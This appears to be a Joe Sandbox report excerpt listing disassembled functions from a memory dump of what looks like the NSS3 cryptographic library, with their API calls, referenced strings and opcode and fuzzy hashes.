String ID: NSS_USE_DECODED_CKA_EC_POINT
API String ID: 2280678669-837408685
Opcode ID: 6a6ba0163b40f05ce63e9b1e6272d3607f29b1e95a95c3a76eab32ab0aaa0349
Instruction ID: 1382c3b6bbe0b33188b71e0e649f538a1175a1888d932680ed0ff1a69ec294c6
Opcode Fuzzy Hash: 6a6ba0163b40f05ce63e9b1e6272d3607f29b1e95a95c3a76eab32ab0aaa0349
Instruction Fuzzy Hash: 33F105B5A102158FDB44CF18C985B86BBF4FF09314F5582AAD8089F746E774EA88CF91

Function 6C9FDC60 Relevance: 21.3, APIs: 9, Strings: 3, Instructions: 282COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,?), ref: 6C9FDD56
memcpy.VCRUNTIME140(0000FFFE,?,?), ref: 6C9FDD7C
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6C9FDE67
memcpy.VCRUNTIME140(0000FFFC,?,?), ref: 6C9FDEC4
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C9FDECD

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C9FDF6D, 6C9FDFCC, 6C9FDFDD
%s at line %d of [%.10s], xrefs: 6C9FDF7C, 6C9FDFEC
database corruption, xrefs: 6C9FDF77, 6C9FDFE7

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: memcpy$_byteswap_ulong
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 2339628231-598938438
Opcode ID: f76d8ffc1856186d7a65594ac8dc0d705b340a5f3820290c2d35c9892fc2f7c8
Instruction ID: 01883f5495366f2578a8b6d03e2cb42d57d84afa80b04a8c201398233e600a36
Opcode Fuzzy Hash: f76d8ffc1856186d7a65594ac8dc0d705b340a5f3820290c2d35c9892fc2f7c8
Instruction Fuzzy Hash: 4DA1F7726042419FD710CF29C880A6BB7F9EF85318F15892DF8A98BF41D730E856CBA1

Function 6CABEDD0 Relevance: 21.2, APIs: 14, Instructions: 239memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(?), ref: 6CABEE0B

Part of subcall function 6CAD0BE0: malloc.MOZGLUE(6CAC8D2D,?,00000000,?), ref: 6CAD0BF8
Part of subcall function 6CAD0BE0: TlsGetValue.KERNEL32(6CAC8D2D,?,00000000,?), ref: 6CAD0C15

PR_SetError.NSS3(FFFFE013,00000000), ref: 6CABEEE1

Part of subcall function 6CAB1D50: TlsGetValue.KERNEL32(00000000,-00000018), ref: 6CAB1D7E
Part of subcall function 6CAB1D50: EnterCriticalSection.KERNEL32(?), ref: 6CAB1D8E
Part of subcall function 6CAB1D50: PR_Unlock.NSS3(?), ref: 6CAB1DD3

TlsGetValue.KERNEL32 ref: 6CABEE51
EnterCriticalSection.KERNEL32(?), ref: 6CABEE65
PR_Unlock.NSS3(?), ref: 6CABEEA2
free.MOZGLUE(?), ref: 6CABEEBB
PR_SetError.NSS3(00000000,00000000), ref: 6CABEED0
PR_Unlock.NSS3(?), ref: 6CABEF48
free.MOZGLUE(?), ref: 6CABEF68
PR_SetError.NSS3(00000000,00000000), ref: 6CABEF7D
PK11_DoesMechanism.NSS3(?,?), ref: 6CABEFA4
free.MOZGLUE(?), ref: 6CABEFDA
PR_SetError.NSS3(FFFFE040,00000000), ref: 6CABF055
free.MOZGLUE(?), ref: 6CABF060

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Errorfree$UnlockValue$CriticalEnterSection$Alloc_DoesK11_MechanismUtilmalloc
String ID:
API String ID: 2524771861-0
Opcode ID: 77a77ff757952d3135efe2b50dc58ca20a3bf319286b67e263cddeba4c348581
Instruction ID: 5f6fce8f81f0b2aba7165379d9dac3ab987570baa1ac8faa3eba1b844239c8e7
Opcode Fuzzy Hash: 77a77ff757952d3135efe2b50dc58ca20a3bf319286b67e263cddeba4c348581
Instruction Fuzzy Hash: 77816175A00205ABDB00DFA5DD45ADE7BB9BF08318F184064F919B3A11E731E964CBE1

Function 6CA84CF0 Relevance: 21.2, APIs: 14, Instructions: 237memoryCOMMON

Download Yara Rule

APIs

PK11_SignatureLen.NSS3(?), ref: 6CA84D80
PORT_Alloc_Util.NSS3(00000000), ref: 6CA84D95
PORT_NewArena_Util.NSS3(00000800), ref: 6CA84DF2
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CA84E2C
PR_SetError.NSS3(FFFFE028,00000000), ref: 6CA84E43
PORT_NewArena_Util.NSS3(00000800), ref: 6CA84E58
SGN_CreateDigestInfo_Util.NSS3(00000001,?,?), ref: 6CA84E85
DER_Encode_Util.NSS3(?,?,6CBD05A4,00000000), ref: 6CA84EA7
PK11_SignWithMechanism.NSS3(?,-00000001,00000000,?,?), ref: 6CA84F17
DSAU_EncodeDerSigWithLen.NSS3(?,?,?), ref: 6CA84F45
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CA84F62
PORT_FreeArena_Util.NSS3(?,00000001), ref: 6CA84F7A
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CA84F89
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CA84FC8

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Util$Arena_$ErrorFreeItem_K11_WithZfree$Alloc_CreateDigestEncodeEncode_Info_MechanismSignSignature
String ID:
API String ID: 2843999940-0
Opcode ID: 80ef891837ad2939bc1db45163951d8bd73514374be68f218a1a2077a129bc5e
Instruction ID: e7d25270226fdd5f43eecb9236ad85677c42f93bdd5ea86c4d7d40a4e2abcc7d
Opcode Fuzzy Hash: 80ef891837ad2939bc1db45163951d8bd73514374be68f218a1a2077a129bc5e
Instruction Fuzzy Hash: EA81B271909301AFE701CF24D950B9BB7E8AB88718F19852DF958DB740E731ED88CB92

Function 6CAC5C10 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 221COMMON

Download Yara Rule

APIs

SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?), ref: 6CAC5C9B
PR_SetError.NSS3(FFFFE043,00000000,?,?,?,?,?), ref: 6CAC5CF4
SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?), ref: 6CAC5CFD
PR_smprintf.NSS3(tokens=[0x%x=<%s>],00000004,00000000,?,?,?,?,?,?), ref: 6CAC5D42
free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?), ref: 6CAC5D4E
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CAC5D78
PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?), ref: 6CAC5E18
TlsGetValue.KERNEL32 ref: 6CAC5E5E
EnterCriticalSection.KERNEL32(?), ref: 6CAC5E72
PR_Unlock.NSS3(?), ref: 6CAC5E8B

Part of subcall function 6CABF820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6CABF854
Part of subcall function 6CABF820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6CABF868
Part of subcall function 6CABF820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6CABF882
Part of subcall function 6CABF820: free.MOZGLUE(04C483FF,?,?), ref: 6CABF889
Part of subcall function 6CABF820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6CABF8A4
Part of subcall function 6CABF820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6CABF8AB
Part of subcall function 6CABF820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6CABF8C9
Part of subcall function 6CABF820: free.MOZGLUE(280F10EC,?,?), ref: 6CABF8D0

Strings

tokens=[0x%x=<%s>], xrefs: 6CAC5D3D
d, xrefs: 6CAC5C36

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: free$CriticalSection$Delete$DestroyErrorModule$EnterR_smprintfUnlockValue
String ID: d$tokens=[0x%x=<%s>]
API String ID: 2028831712-1373489631
Opcode ID: d96c16a42a13a146f5f09e661e3b44ff27bfc68745f4434c7428b1edb4e076f1
Instruction ID: 56dd46da83d80c714c5968e264291ff0138da20edcf29eb52f20b769823a1d61
Opcode Fuzzy Hash: d96c16a42a13a146f5f09e661e3b44ff27bfc68745f4434c7428b1edb4e076f1
Instruction Fuzzy Hash: A771E3B4F052019BEB019F25DD8576A3279BF5531CF180035F8099BB42EB32E999DB93

Function 6CAB8F40 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(6CAB9582), ref: 6CAB8F5B

Part of subcall function 6CACBE30: SECOID_FindOID_Util.NSS3(6CA8311B,00000000,?,6CA8311B,?), ref: 6CACBE44

PORT_NewArena_Util.NSS3(00000800), ref: 6CAB8F6A

Part of subcall function 6CAD0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CA787ED,00000800,6CA6EF74,00000000), ref: 6CAD1000
Part of subcall function 6CAD0FF0: PR_NewLock.NSS3(?,00000800,6CA6EF74,00000000), ref: 6CAD1016
Part of subcall function 6CAD0FF0: PL_InitArenaPool.NSS3(00000000,security,6CA787ED,00000008,?,00000800,6CA6EF74,00000000), ref: 6CAD102B

SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6CAB8FC3
PK11_GetIVLength.NSS3(-00000001), ref: 6CAB8FE0
SEC_ASN1DecodeItem_Util.NSS3(?,?,6CB9D820,6CAB9576), ref: 6CAB8FF9
DER_GetInteger_Util.NSS3(?), ref: 6CAB901D
PORT_ZAlloc_Util.NSS3(?), ref: 6CAB903E
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CAB9062
memcpy.VCRUNTIME140(00000024,?,?), ref: 6CAB90A2
PORT_ZAlloc_Util.NSS3(?), ref: 6CAB90CA
memcpy.VCRUNTIME140(00000018,?,?), ref: 6CAB90F0
PR_SetError.NSS3(FFFFE006,00000000), ref: 6CAB912D
free.MOZGLUE(00000000), ref: 6CAB9136
PORT_FreeArena_Util.NSS3(?,00000001), ref: 6CAB9145

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Util$Tag_$AlgorithmAlloc_Arena_Findmemcpy$ArenaDecodeErrorFreeInitInteger_Item_K11_LengthLockPoolcallocfree
String ID:
API String ID: 3626836424-0
Opcode ID: f51b30414925d5f3a97b0413eb5cd6e7215cc0a894523e942d5748e4915905a9
Instruction ID: 570baa934ec8e4f4c066fd4fca42f0b7941d7fa0fe6c70a250554cd14052087c
Opcode Fuzzy Hash: f51b30414925d5f3a97b0413eb5cd6e7215cc0a894523e942d5748e4915905a9
Instruction Fuzzy Hash: 6651E4B1A042409BE700CF38DD8179B77F8AF95318F094529E85897741E731E989CBD2

Function 6CB8C8A0 Relevance: 21.1, APIs: 14, Instructions: 94stringCOMMON

Download Yara Rule

APIs

calloc.MOZGLUE(00000001,00000020), ref: 6CB8C8B9
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CB8C8DA
malloc.MOZGLUE(00000001), ref: 6CB8C8E4
strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6CB8C8F8
PR_NewLock.NSS3 ref: 6CB8C909
PR_NewCondVar.NSS3(00000000), ref: 6CB8C918
PR_NewCondVar.NSS3(00000000), ref: 6CB8C92A

Part of subcall function 6CA60F00: PR_GetPageSize.NSS3(6CA60936,FFFFE8AE,?,6C9F16B7,00000000,?,6CA60936,00000000,?,6C9F204A), ref: 6CA60F1B
Part of subcall function 6CA60F00: PR_NewLogModule.NSS3(clock,6CA60936,FFFFE8AE,?,6C9F16B7,00000000,?,6CA60936,00000000,?,6C9F204A), ref: 6CA60F25

free.MOZGLUE(00000000), ref: 6CB8C947

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Cond$LockModulePageSizecallocfreemallocstrcpystrlen
String ID:
API String ID: 2931242645-0
Opcode ID: c8c0b295c8e0a599b121b4a6c398636d81c9ea8de18d2ed4c9a21cefd6302505
Instruction ID: 7bf7bb3275f732766feb9aa9e17fc6db0febacdc848cc7f2928179af85c3e077
Opcode Fuzzy Hash: c8c0b295c8e0a599b121b4a6c398636d81c9ea8de18d2ed4c9a21cefd6302505
Instruction Fuzzy Hash: D821EBF1A017425BDB117F799C0965B76B8EF15259F140534F85BC3B00E731D518C7A6

Function 6CA6AF30 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 93COMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3 ref: 6CA6AF47

Part of subcall function 6CB39090: TlsGetValue.KERNEL32 ref: 6CB390AB
Part of subcall function 6CB39090: TlsGetValue.KERNEL32 ref: 6CB390C9
Part of subcall function 6CB39090: EnterCriticalSection.KERNEL32 ref: 6CB390E5
Part of subcall function 6CB39090: TlsGetValue.KERNEL32 ref: 6CB39116
Part of subcall function 6CB39090: LeaveCriticalSection.KERNEL32 ref: 6CB3913F

FreeLibrary.KERNEL32(?), ref: 6CA6AF6D
free.MOZGLUE(?), ref: 6CA6AFA4
free.MOZGLUE(?), ref: 6CA6AFAA
PR_ExitMonitor.NSS3 ref: 6CA6AFB5
PR_LogPrint.NSS3(%s decr => %d,?,?), ref: 6CA6AFF5
PR_ExitMonitor.NSS3 ref: 6CA6B005
PR_SetError.NSS3(FFFFE89D,00000000), ref: 6CA6B014
PR_LogPrint.NSS3(Unloaded library %s,?), ref: 6CA6B028
PR_SetError.NSS3(FFFFE89D,00000000), ref: 6CA6B03C

Strings

Unloaded library %s, xrefs: 6CA6B023
%s decr => %d, xrefs: 6CA6AFF0

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: MonitorValue$CriticalEnterErrorExitPrintSectionfree$FreeLeaveLibrary
String ID: %s decr => %d$Unloaded library %s
API String ID: 4015679603-2877805755
Opcode ID: 94d09af34bef9769c70b5328090287e3c7dc60a843b2f65d1e9df61b997fddc3
Instruction ID: 27200426b9792da48607b898c83ec6946b71ab2e624c5bdc7ec7a1692252cdcb
Opcode Fuzzy Hash: 94d09af34bef9769c70b5328090287e3c7dc60a843b2f65d1e9df61b997fddc3
Instruction Fuzzy Hash: 4531D7B5A44161ABE7019F66EC40A59B7B6EF05718B184125EC0A97E01E732FC54C7E3

Function 6CAB6C30 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 58stringCOMMON

Download Yara Rule

APIs

strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6CAB781D,00000000,6CAABE2C,?,6CAB6B1D,?,?,?,?,00000000,00000000,6CAB781D), ref: 6CAB6C40
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6CAB781D,?,6CAABE2C,?), ref: 6CAB6C58
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6CAB781D), ref: 6CAB6C6F
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6CAB6C84
PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6CAB6C96

Part of subcall function 6CA61240: TlsGetValue.KERNEL32(00000040,?,6CA6116C,NSPR_LOG_MODULES), ref: 6CA61267
Part of subcall function 6CA61240: EnterCriticalSection.KERNEL32(?,?,?,6CA6116C,NSPR_LOG_MODULES), ref: 6CA6127C
Part of subcall function 6CA61240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6CA6116C,NSPR_LOG_MODULES), ref: 6CA61291
Part of subcall function 6CA61240: PR_Unlock.NSS3(?,?,?,?,6CA6116C,NSPR_LOG_MODULES), ref: 6CA612A0

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6CAB6CAA

Strings

rdb:, xrefs: 6CAB6C69
dbm:, xrefs: 6CAB6C3A
sql:, xrefs: 6CAB6C52
extern:, xrefs: 6CAB6C7E
dbm, xrefs: 6CAB6CA4
NSS_DEFAULT_DB_TYPE, xrefs: 6CAB6C91

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: strncmp$CriticalEnterSectionSecureUnlockValuegetenvstrcmp
String ID: NSS_DEFAULT_DB_TYPE$dbm$dbm:$extern:$rdb:$sql:
API String ID: 4221828374-3736768024
Opcode ID: dc9596dfbd665f38fa32418286c7f94141044fe1f9351c74d3fe4b0e00264bfa
Instruction ID: 8f86f5e8055021d152823b0265255728750e83dad6f912f5653be2e8eec479f0
Opcode Fuzzy Hash: dc9596dfbd665f38fa32418286c7f94141044fe1f9351c74d3fe4b0e00264bfa
Instruction Fuzzy Hash: 2A018FA570338637EA0027BB6D5AF26265C9B53169F180431FE04F1A81EBB3F61540B9

Function 6CAC4E60 Relevance: 19.7, APIs: 13, Instructions: 186COMMON

Download Yara Rule

APIs

PR_SetErrorText.NSS3(00000000,00000000,?,6CA878F8), ref: 6CAC4E6D

Part of subcall function 6CA609E0: TlsGetValue.KERNEL32(00000000,?,?,?,6CA606A2,00000000,?), ref: 6CA609F8
Part of subcall function 6CA609E0: malloc.MOZGLUE(0000001F), ref: 6CA60A18
Part of subcall function 6CA609E0: memcpy.VCRUNTIME140(?,?,00000001), ref: 6CA60A33

PR_SetError.NSS3(FFFFE09A,00000000,?,?,?,6CA878F8), ref: 6CAC4ED9

Part of subcall function 6CAB5920: NSSUTIL_ArgHasFlag.NSS3(flags,printPolicyFeedback,?,?,?,?,?,?,00000000,?,00000000,?,6CAB7703,?,00000000,00000000), ref: 6CAB5942
Part of subcall function 6CAB5920: NSSUTIL_ArgHasFlag.NSS3(flags,policyCheckIdentifier,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6CAB7703), ref: 6CAB5954
Part of subcall function 6CAB5920: NSSUTIL_ArgHasFlag.NSS3(flags,policyCheckValue,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6CAB596A
Part of subcall function 6CAB5920: SECOID_Init.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6CAB5984
Part of subcall function 6CAB5920: NSSUTIL_ArgGetParamValue.NSS3(disallow,00000000), ref: 6CAB5999
Part of subcall function 6CAB5920: free.MOZGLUE(00000000), ref: 6CAB59BA
Part of subcall function 6CAB5920: NSSUTIL_ArgGetParamValue.NSS3(allow,00000000), ref: 6CAB59D3
Part of subcall function 6CAB5920: free.MOZGLUE(00000000), ref: 6CAB59F5
Part of subcall function 6CAB5920: NSSUTIL_ArgGetParamValue.NSS3(disable,00000000), ref: 6CAB5A0A
Part of subcall function 6CAB5920: free.MOZGLUE(00000000), ref: 6CAB5A2E
Part of subcall function 6CAB5920: NSSUTIL_ArgGetParamValue.NSS3(enable,00000000), ref: 6CAB5A43

SECMOD_FindModule.NSS3(?,?,?,?,?,?,?,?,?,6CA878F8), ref: 6CAC4EB3

Part of subcall function 6CAC4820: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6CAC4EB8,?,?,?,?,?,?,?,?,?,?,6CA878F8), ref: 6CAC484C
Part of subcall function 6CAC4820: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6CAC4EB8,?,?,?,?,?,?,?,?,?,?,6CA878F8), ref: 6CAC486D
Part of subcall function 6CAC4820: PR_SetError.NSS3(FFFFE09A,00000000,00000000,-00000001,00000000,?,6CAC4EB8,?), ref: 6CAC4884

SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?,?,?,6CA878F8), ref: 6CAC4EC0

Part of subcall function 6CAC4470: TlsGetValue.KERNEL32(00000000,?,6CA87296,00000000), ref: 6CAC4487
Part of subcall function 6CAC4470: EnterCriticalSection.KERNEL32(?,?,?,6CA87296,00000000), ref: 6CAC44A0
Part of subcall function 6CAC4470: PR_Unlock.NSS3(?,?,?,?,6CA87296,00000000), ref: 6CAC44BB

TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6CA878F8), ref: 6CAC4F16
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6CA878F8), ref: 6CAC4F2E
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,6CA878F8), ref: 6CAC4F40
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6CA878F8), ref: 6CAC4F6C
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6CA878F8), ref: 6CAC4F80
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6CA878F8), ref: 6CAC4F8F
PK11_UpdateSlotAttribute.NSS3(?,6CB9DCB0,00000000), ref: 6CAC4FFE
PK11_UserDisableSlot.NSS3(0000001E), ref: 6CAC501F
SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?,?,6CA878F8), ref: 6CAC506B

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Value$Param$CriticalEnterErrorFlagModuleSectionUnlockfree$DestroyK11_Slotstrcmp$AttributeDisableFindInitTextUpdateUsermallocmemcpy
String ID:
API String ID: 560490210-0
Opcode ID: 47d851fb2ca52185b80d439087d3908a6afb3c7f235b53ee91db596be2fb6269
Instruction ID: 3bbd4e7c401a276e3dda7dd91a8f138c161fbb280fd5cd344d1fcda70e753f9b
Opcode Fuzzy Hash: 47d851fb2ca52185b80d439087d3908a6afb3c7f235b53ee91db596be2fb6269
Instruction Fuzzy Hash: AD51F1B5A002059FEB019F24ED01AAA76B4FF0531DF180134EC0687A01FB31E998CAD3

Function 6CA6ACC0 Relevance: 19.6, APIs: 13, Instructions: 150stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CA6ACE2
malloc.MOZGLUE(00000001), ref: 6CA6ACEC
strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6CA6AD02
TlsGetValue.KERNEL32 ref: 6CA6AD3C
calloc.MOZGLUE(00000001,?), ref: 6CA6AD8C
PR_Unlock.NSS3 ref: 6CA6ADC0
free.MOZGLUE(00000000), ref: 6CA6AE48
PR_SetError.NSS3(FFFFE890,00000000), ref: 6CA6AE58
free.MOZGLUE(00000000), ref: 6CA6AE69
free.MOZGLUE(?), ref: 6CA6AE78
PR_Unlock.NSS3 ref: 6CA6AE8C
